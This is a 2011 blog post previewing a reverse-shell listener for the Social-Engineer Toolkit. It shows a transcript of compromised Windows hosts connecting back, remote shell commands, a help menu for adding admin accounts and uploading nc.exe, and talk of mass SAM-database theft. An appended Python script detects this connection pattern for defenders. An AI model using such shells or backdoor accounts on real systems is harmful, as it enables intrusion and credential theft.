March 03, 2011
SET v1.3 Interactive Command Shell New Addition
Written by
David Kennedy
Security Testing & Analysis
Social Engineering
While I have been working frantically on The Social-Engineer Toolkit (SET) v1.3, I wanted to give a little teaser of a new addition that I've been working on. I have to say this is probably one of the hardest tasks I've built into SET and coded in Python. Building a raw multi-threaded socket handler that can distinguish between inter-communicating threads and handle them on separate channels was a rough task, since Python threads are pretty immature overall. Anyway, the new addition is a purely Python-driven, SET-based listener and shell that handles a slew of tasks. The good news is that it's heavily obfuscated, will leverage encrypted communications, and acts as a reverse shell. My thinking here is to have a purely SET-driven interactive payload instead of leveraging Metasploit-based payloads. While payload support within SET will still include Metasploit, this opens up additional avenues and capabilities that can be built into SET so it can grow and become more independent over time. Here is a small teaser of the shell. I don't have a release date yet; I'm hoping for the end of the month.
One more thing: the sockets are stored in memory, so in theory I can add the ability to run a task on every shell at once. If you wanted to download the SAM database from 30 systems at once, that would be possible instantaneously.
The Social-Engineer Toolkit (SET) is listening on: 0.0.0.0:80
[*] Connection received from: 172.16.32.131
[*] Establishing encrypted tunnel...
*** Pick the number of the shell you want ***
1: 172.16.32.131
Enter your numeric choice: 1
[*] Dropping into the Social-Engineer Toolkit Interactive Shell.
set>
set>
set>
[*] Connection received from: 172.16.32.132
[*] Connection received from: 172.16.32.133
[*] Connection received from: 172.16.32.134
set> shell
[*] Dropping into a shell. Enter your shell commands below.
set/command_shell>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 172.16.32.131
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.32.2
set/command_shell>quit
set> quit
[*] Exiting the Social-Engineer Toolkit (SET) Interactive Shell.
*** Pick the number of the shell you want ***
1: 172.16.32.131
2: 172.16.32.132
3: 172.16.32.133
4: 172.16.32.134
Enter your numeric choice: 3
set> [*] Dropping into the Social-Engineer Toolkit Interactive Shell.
set> shell
set> [*] Dropping into a shell. Enter your shell commands below.
set/command_shell>ipconfig
set>
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 172.16.32.133
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.32.2
set> ?
Welcome to the Social-Engineer Toolkit Help Menu.
Enter the following commands for usage:
Command: shell
Explanation: drop into a command shell
Example: shell
Command: localadmin
Explanation: adds a local admin to the system
Example: localadmin bob p@55w0rd!
Command: domainadmin
Explanation: adds a local admin to the system
Example: domainadmin bob p@55w0rd!
Command: download_file
Explanation: downloads a file locally to the SET root directory.
Example: download_file C:\boot.ini
Command upload_file
Explanation: uploads a file to the victim system
Example: upload_file /root/nc.exe C:\nc.exe
set/command_shell> quit
set> localadmin testing123 asfsdfdsfdsfds
set>
[*] Attempting to add a user account with administrative permissions.
[*] User add completed. Check the system to ensure it worked correctly.
set>
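Added here as an example that is not part of SET or this post: a small defender-side check that flags the pattern the transcript above shows, several internal hosts opening outbound connections to one listener on port 80 within a short window. The log format, the internal range, the listener address and all sample lines are constructed for this example.

```python
"""Flag the reverse-shell fan-in pattern seen in the SET transcript:
several internal hosts opening outbound connections to one listener
(here on port 80) inside a short window. Constructed example."""
from collections import defaultdict
from datetime import datetime
from ipaddress import ip_address, ip_network

INTERNAL = ip_network("172.16.32.0/24")  # assumed internal range

# Constructed firewall-style connection log: "<ts> <src> -> <dst>:<port>"
SAMPLE_LOG = """\
2011-03-03T10:00:01 172.16.32.131 -> 203.0.113.10:80
2011-03-03T10:00:05 172.16.32.131 -> 172.16.32.2:53
2011-03-03T10:00:09 172.16.32.132 -> 203.0.113.10:80
2011-03-03T10:00:12 172.16.32.133 -> 203.0.113.10:80
2011-03-03T10:00:15 172.16.32.134 -> 203.0.113.10:80
2011-03-03T10:30:00 172.16.32.140 -> 203.0.113.10:80
2011-03-03T10:00:20 172.16.32.131 -> 198.51.100.7:443
"""


def parse_line(line):
    """Split one log line into (timestamp, src, dst, port)."""
    ts, src, _arrow, dst = line.split()
    dst_ip, dst_port = dst.rsplit(":", 1)
    return datetime.fromisoformat(ts), ip_address(src), ip_address(dst_ip), int(dst_port)


def detect_fan_in(log_text, min_sources=3, window_seconds=300):
    """Return [(dst_ip, port, [sources])] for external listeners that received
    connections from >= min_sources distinct internal hosts within any
    window_seconds-long span. Only internal -> external traffic is considered."""
    by_listener = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port = parse_line(line)
        if src in INTERNAL and dst not in INTERNAL:
            by_listener[(dst, port)].append((ts, src))
    hits = []
    for (dst, port), events in by_listener.items():
        events.sort()
        for i, (t0, _src0) in enumerate(events):
            # sliding window anchored at each event; events are time-sorted
            srcs = {s for t, s in events[i:] if (t - t0).total_seconds() <= window_seconds}
            if len(srcs) >= min_sources:
                hits.append((str(dst), port, sorted(str(s) for s in srcs)))
                break
    return hits
```

A listener reached by four workstations on port 80 in a few seconds is worth a look even before payload inspection, since the transcript shows the shell works over a plain TCP channel rather than real HTTP.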